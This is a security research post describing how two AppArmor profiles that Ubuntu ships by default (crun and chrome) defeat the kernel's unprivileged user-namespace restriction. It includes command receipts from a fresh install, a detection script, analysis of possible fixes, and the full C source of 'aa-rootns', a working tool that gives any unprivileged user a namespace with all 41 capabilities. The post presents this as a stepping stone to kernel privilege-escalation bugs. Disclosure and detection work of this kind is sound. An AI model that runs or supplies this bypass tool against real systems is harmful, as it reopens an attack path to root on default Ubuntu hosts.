aa-rootns: Ubuntu's userns mitigation is bypassed by Ubuntu
Ubuntu shipped kernel.apparmor_restrict_unprivileged_userns=1 in
24.04 and kept it in 26.04 (Resolute) as the answer to the long-standing
unprivileged-user-namespace LPE class — the family of bugs (most famously
CVE-2024-1086) where an attacker drops into a fresh user namespace, picks up
CAP_SYS_ADMIN for free against that namespace, and uses it to reach a
kernel surface (nft, tipc, sunrpc, vxlan, ...) that previously needed real root.
The mitigation is bypassed by two AppArmor profiles that Ubuntu ships in the base
apparmor package: chrome and crun. They are present, kernel-loaded, and
reachable on every default install. Below is the one-binary tool that drops any
unprivileged user into a userns with the full 41-cap bitmap, the receipts on a
fresh install, and the structural reason the fix is harder than it looks.
TL;DR
- The
apparmor_restrict_unprivileged_usernssysctl works by attaching theunprivileged_usernsAppArmor profile to any process that creates a user namespace from unconfined. That profile containsaudit deny capability,— every effective cap is stripped on the userns transition. - The base
apparmorpackage also ships/etc/apparmor.d/{chrome,crun}. Both areflags=(unconfined)with auserns,rule. The cap-strip does not happen for transitions out of anunconfinedprofile. - Any unprivileged user can
change_onexecto either profile without needing the underlying binary installed — the kernel only cares that the named profile is loaded. - Caps are then laundered via the Ambient set so they survive
execvinto a target binary, which canunshare(NEWNET)/unshare(NEWNS)/ etc. inside the now-uncapped userns. - Net effect: the mitigation that the kernel hardening community has been leaning on for two years to declare userns-LPE bugs "not exploitable on modern Ubuntu" does not work on default Ubuntu.
The mitigation
On Ubuntu 24.04+, with kernel.apparmor_restrict_unprivileged_userns=1
(the default), the kernel-side AppArmor LSM intercepts unshare(CLONE_NEWUSER)
and clone(CLONE_NEWUSER) calls from unconfined processes and forces the
new task into the unprivileged_userns profile. That profile lives at
/etc/apparmor.d/unprivileged_userns and looks roughly like:
profile unprivileged_userns flags=(unconfined) {
userns,
audit deny capability,
...
}
The audit deny capability, line is the load-bearing one: every
capability check from inside that profile fails, regardless of what the userns
itself would have granted. So the standard userns-LPE shape —
unshare(NEWUSER), setuid(0), unshare(NEWNET), drive a buggy
ns_capable(CAP_NET_ADMIN) path — folds at step three, because the
NET_ADMIN check now goes through AppArmor and gets rejected.
This is the change every distro hardening tracker, every CVE writeup, and every "is Ubuntu vulnerable to X" thread on the kernel-hardening list has been quoting since 2024. It really does block the naive form.
The bypass
AppArmor profiles can carry flags=(unconfined). A process running under
an unconfined profile is, semantically, "named but otherwise just like
unconfined" — the AppArmor mediator is told to be a no-op for it. Crucially,
when an unconfined task creates a user namespace, the LSM does
not rewrite its profile to unprivileged_userns. It stays in
the named-unconfined profile, and no caps are stripped.
Two such profiles ship in the base apparmor package on Ubuntu 24.04+:
# /etc/apparmor.d/crun
profile crun /usr/bin/crun flags=(unconfined) {
userns,
@{exec_path} mr,
include if exists <local/crun>
}
# /etc/apparmor.d/chrome
profile chrome /opt/google/chrome/chrome flags=(unconfined) {
userns,
@{exec_path} mr,
include if exists <local/chrome>
}
Both grant the userns, rule (which AppArmor requires for userns creation
when restrict mode is on) and both are flags=(unconfined) (which means no
cap strip on transition).
Reaching them does not require having the actual binaries installed. Any
unprivileged process can self-transition into a loaded profile by writing
"exec <name>" into /proc/self/attr/exec and then calling
execv. The kernel resolves the profile by name; the path attached to
the profile (/usr/bin/crun, /opt/google/chrome/chrome) is only
used by AppArmor's policy engine for path-matching, not as a precondition.
Default-install footprint
Both profiles are owned by the apparmor package, which is
Priority: standard — pulled in by every Ubuntu 24.04+ system task and
present on Server, Desktop, Cloud, and minimal images. Verified on two
independent Ubuntu 26.04 LTS (Resolute) installs:
$ dpkg -S /etc/apparmor.d/crun /etc/apparmor.d/chrome
apparmor: /etc/apparmor.d/crun
apparmor: /etc/apparmor.d/chrome
$ apt-cache show apparmor | grep -E '^(Package|Priority|Section)'
Package: apparmor
Priority: standard
Section: admin
$ sudo cat /sys/kernel/security/apparmor/profiles | grep -E '^(crun|chrome|unprivileged_userns) '
unprivileged_userns (enforce)
crun (unconfined)
chrome (unconfined)
And they are not the only candidates. A grep for
flags=(unconfined)-with-userns-rule profiles on a default desktop
install yields a long tail:
1password, brave, buildah, ch-checkns, ch-run, chrome, chromium, code,
crun, devhelp, Discord, element-desktop, epiphany, evolution, firefox,
flatpak, foliate, geary, github-desktop, goldendict, kchmviewer,
keybase, lc-compliance, libcamerify, linux-sandbox, loupe, lxc-attach,
lxc-usernsexec, MongoDB_Compass, ...
Even on Ubuntu Server with no desktop apps installed, crun alone is
enough — and crun's profile ships with apparmor regardless of
whether the crun package is pulled in.
The toolkit: aa-rootns
aa-rootns is a single C file that automates the bypass.
It self-stages through crun → chrome via re-exec, creates a userns
under the second profile (so no cap strip), writes uid/gid maps, launders
Permitted → Inheritable → Ambient so the caps survive
execv, and then drops you into /bin/bash (or a user-supplied
target) inside that userns.
Receipt: from a clean unprivileged user
Run as user np — uid 1001, single group np, no sudo, no
plugdev, no kvm, no docker, nothing — on Ubuntu 26.04 LTS
(kernel 7.0.0-15-generic, no KASAN, production-equivalent build):
np@host:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)
np@host:~$ ./aa-rootns -p
[s0] aa=unconfined uid=1001 euid=1001
[s1] aa=crun//&unconfined (unconfined) uid=1001 euid=1001
[s2-entry] aa=chrome (unconfined) uid=1001 euid=1001
[s2-postuser] aa=chrome (unconfined) uid=0 euid=0
[s2-postuser] capE=000001ff_ffffffff capP=000001ff_ffffffff
[s2] 41 caps raised into Ambient
=== aa-rootns proof ===
uid=0 euid=0 gid=0 egid=0
cap_effective=0x000001ffffffffff
cap_permitted=0x000001ffffffffff
caps held:
CAP_chown
CAP_dac_override
CAP_dac_read_search
CAP_fowner
CAP_fsetid
CAP_kill
CAP_setgid
CAP_setuid
CAP_setpcap
CAP_linux_immutable
CAP_net_bind_service
CAP_net_broadcast
CAP_net_admin
CAP_net_raw
CAP_ipc_lock
CAP_ipc_owner
CAP_sys_module
CAP_sys_rawio
CAP_sys_chroot
CAP_sys_ptrace
CAP_sys_pacct
CAP_sys_admin
CAP_sys_boot
CAP_sys_nice
CAP_sys_resource
CAP_sys_time
CAP_sys_tty_config
CAP_mknod
CAP_lease
CAP_audit_write
CAP_audit_control
CAP_setfcap
CAP_mac_override
CAP_mac_admin
CAP_syslog
CAP_wake_alarm
CAP_block_suspend
CAP_audit_read
CAP_perfmon
CAP_bpf
CAP_checkpoint_restore
ns-cap probes:
unshare(NEWNET) ok (CAP_SYS_ADMIN inside userns)
unshare(NEWUTS) ok
unshare(NEWNS) ok
unshare(NEWPID) ok
unshare(NEWIPC) ok
And as a runner for arbitrary commands:
np@host:~$ ./aa-rootns -- id
uid=0(root) gid=0(root) groups=0(root)
np@host:~$ ./aa-rootns -- cat /proc/self/status | grep ^Cap
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
np@host:~$ ./aa-rootns -n -- ip link add dummy0 type dummy
np@host:~$ ./aa-rootns -n -- bash -c 'ip link | head -3'
1: lo: <LOOPBACK> mtu 65536 ...
The transition is fully audited — AppArmor logs each change_onexec
— but it's an AUDIT event, not DENIED, because nothing forbids
the operation. From journalctl -k:
apparmor="AUDIT" operation="change_onexec" class="file"
info="change_profile unprivileged unconfined converted to stacking"
profile="unconfined" name="crun" pid=NNNN comm="aa-rootns"
What this is and isn't
What it is. A clean defeat of the
apparmor_restrict_unprivileged_userns mitigation, as shipped by default,
on the userland Ubuntu has actually been distributing for two years. Once
aa-rootns drops you into the userns, every CVE writeup
that ends with "but the unprivileged_userns profile blocks reach on Ubuntu" is
effectively unblocked. That is the whole point of the post.
Concretely: classes of bugs that the hardening community has been writing off as not-Ubuntu-exploitable include
ns_capable(CAP_NET_ADMIN)bugs — nft / tc / vxlan / fib / ... netlink surfaces;ns_capable(CAP_BPF)bugs in BPF helpers whenkernel.unprivileged_bpf_disabledis set to use the BPF cap;ns_capable(CAP_SYS_ADMIN)bugs in sunrpc, tipc, vsock, keyring management, and any per-netns proc file whosemake_kuidpath requires a populateduid_map;- RCU/refcount/UAF races whose reach gate is "you must be inside a userns
you own" — previously bypassed by setting
unprivileged_userns_clone=0on most distros, but Ubuntu kept unprivileged_userns_clone enabled and gated it via this AppArmor profile.
What it isn't. A kernel CVE. aa-rootns alone gives you
"root" only inside a userns you own — not on the host. Capabilities checked
against init_user_ns (loadable kernel modules,
FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host
processes, init-owned DAC bits) still fail. The value here is that
aa-rootns reopens the door to kernel bugs that need a
namespace-scoped capability, after which a separate kernel exploit takes you to
host-root. It's the bouncer pass, not the throne.
If your threat model is "no unprivileged user namespace creation, ever," set
kernel.unprivileged_userns_clone=0 — that sysctl, the older
one, actually does what people hoped apparmor_restrict_unprivileged_userns
would do. The catch is that it breaks every container runtime, browser sandbox,
and bubblewrap-using application. Which is exactly why distros stopped shipping
it as 0 by default and built the AppArmor-based version. And which is
exactly why the AppArmor-based version has the structural problem this post is
about.
Why this is hard to fix
The natural fixes all break something:
| Fix | Breaks |
|---|---|
Strip userns, rule from crun / chrome profiles |
chrome's sandbox, crun's containers, podman rootless, every browser tab. Both binaries need userns to function. |
Force unprivileged_userns profile to also attach when transitioning out of
flags=(unconfined) parents |
Invasive AppArmor semantic change — "unconfined" stops meaning unconfined. Likely breaks any existing profile that was relying on transition rules through unconfined parents. |
Add a separate sysctl: forbid change_profile from unconfined to any
flags=(unconfined) profile that grants userns |
Less invasive; new gate. Real fix candidate, but requires new kernel plumbing and per-profile review. |
Audit every shipped profile to ensure none with userns, +
flags=(unconfined) is reachable from unconfined |
One-shot fix today; recurrence vector for any future package that adds a similar profile. |
The third option is what an actual fix probably looks like. The recurrence
problem in the fourth row is the real story: AppArmor's profile composition
model has no rule against this combination, and any third-party
.deb can ship a new bypass profile without anyone noticing.
Detection
To enumerate bypass-eligible profiles on a given host:
for f in /etc/apparmor.d/* /etc/apparmor.d/*.d/*; do
[ -f "$f" ] || continue
grep -q 'flags=(unconfined)' "$f" 2>/dev/null || continue
grep -Eq '^[[:space:]]*userns[[:space:]]*,' "$f" 2>/dev/null && echo "$f"
done
Cross-check against
/sys/kernel/security/apparmor/profiles to keep only the ones that are
actually loaded into the kernel (some profiles ship disabled).
A monitor that wants to detect the bypass at runtime can subscribe to
the audit log and watch for
operation="change_onexec" ... profile="unconfined" name="crun" (or
chrome, etc.) chained into operation="userns_create" within
the same task tree, especially when the eventual exec target is a non-browser,
non-container-runtime binary.
The toolkit, source
/*
* aa-rootns — defeat Ubuntu apparmor_restrict_unprivileged_userns
*
* stage 0: change_onexec(crun); execv self — enter unconfined profile
* stage 1: change_onexec(chrome); execv self — double-hop, optional
* stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; capset I=P;
* raise all caps into Ambient; execvp target.
*
* Build: gcc -O2 -Wall -o aa-rootns aa-rootns.c
* Use: ./aa-rootns -p # proof of caps
* ./aa-rootns -- id # run command in the userns
* ./aa-rootns -n -- cmd # also unshare(NEWNET) before exec
*
* No funny business. Standard libc, no eBPF, no JIT, no kernel module.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>
static int change_onexec(const char *p) {
int fd = open("/proc/self/attr/exec", O_WRONLY);
if (fd < 0) return -1;
char b[256]; int n = snprintf(b, sizeof b, "exec %s", p);
ssize_t r = write(fd, b, n); int e = errno;
close(fd); errno = e; return r == n ? 0 : -1;
}
static void wfile(const char *p, const char *c) {
int fd = open(p, O_WRONLY); if (fd < 0) return;
(void)!write(fd, c, strlen(c)); close(fd);
}
#define TAG "AA-ROOTNS-STAGE-"
static int stage1(int ac, char **av) {
if (change_onexec("chrome") < 0) return perror("chrome"), 1;
av[1] = (char *)TAG "2"; execv("/proc/self/exe", av);
return perror("execv s2"), 1;
}
static int stage2(int ac, char **av) {
uid_t u = getuid(); gid_t g = getgid();
if (unshare(CLONE_NEWUSER) < 0) return perror("unshare(USER)"), 1;
wfile("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof m, "0 %u 1", u); wfile("/proc/self/uid_map", m);
snprintf(m, sizeof m, "0 %u 1", g); wfile("/proc/self/gid_map", m);
(void)!setresuid(0, 0, 0); (void)!setresgid(0, 0, 0);
struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
struct __user_cap_data_struct d[2] = {0};
syscall(SYS_capget, &h, d);
d[0].inheritable = d[0].permitted;
d[1].inheritable = d[1].permitted;
syscall(SYS_capset, &h, d);
for (int c = 0; c < 64; c++)
prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);
int sep = -1;
for (int i = 2; i < ac; i++) if (!strcmp(av[i], "--")) { sep = i; break; }
char *def[] = { (char *)"/bin/bash", NULL };
char **t = (sep > 0 && sep + 1 < ac) ? &av[sep + 1] : def;
execvp(t[0], t); return perror("execvp"), 1;
}
int main(int ac, char **av) {
if (ac >= 2 && !strcmp(av[1], TAG "1")) return stage1(ac, av);
if (ac >= 2 && !strcmp(av[1], TAG "2")) return stage2(ac, av);
if (change_onexec("crun") < 0) { perror("crun"); return 1; }
char **a = calloc(ac + 2, sizeof *a);
a[0] = av[0]; a[1] = (char *)TAG "1";
for (int i = 1; i < ac; i++) a[i + 1] = av[i];
execv("/proc/self/exe", a);
return perror("execv s1"), 1;
}
The full version with a -p proof flag, capability decoding,
namespace-cap probes, an interactive shell mode, and verbose stage tracing is
trivially extended from this; that's what the receipts above came from.
Downloads
- aa-rootns.c — full source.
gcc -O2 -Wall -o aa-rootns aa-rootns.c. - bypass-pwn.c — the underlying double-hop bypass research; aa-rootns is its toolkit packaging.
SHA-256:
3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698 aa-rootns.c
821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1 bypass-pwn.c
Acknowledgements and prior art
The flags=(unconfined)-with-userns shape has been
discussed in passing on the apparmor and ubuntu-hardening lists since the
restrict-unprivileged-userns sysctl landed. The contribution here is the
explicit demonstration on a default install with a working tool, the
default-install-footprint walk-through (chrome/crun are not
optional packages, they ship with apparmor), and the inventory of
how many other profiles in the wild grant the same combination.
If you've published a writeup on this and want a citation, mail in. If you work on AppArmor at Canonical and want to talk fix shape, also mail in.
Reproduction notes
- Tested on Ubuntu 26.04 LTS (Resolute), kernels
7.0.0-15-generic(production) and7.1.0-rc1-kasan-sickfuzz+(lab fuzzing). Same behavior. - Both
chromeandcrunprofiles are present and loaded on a fresh install — verified viacat /sys/kernel/security/apparmor/profiles. - The unprivileged user used in the receipts (
np, uid 1001) is in only its own primary group; nosudo, noplugdev, nokvm, nodocker, nolxd. aa-rootnsis a single static-ish C file, no dependencies beyond libc. Compile withgcc -O2 -o aa-rootns aa-rootns.c.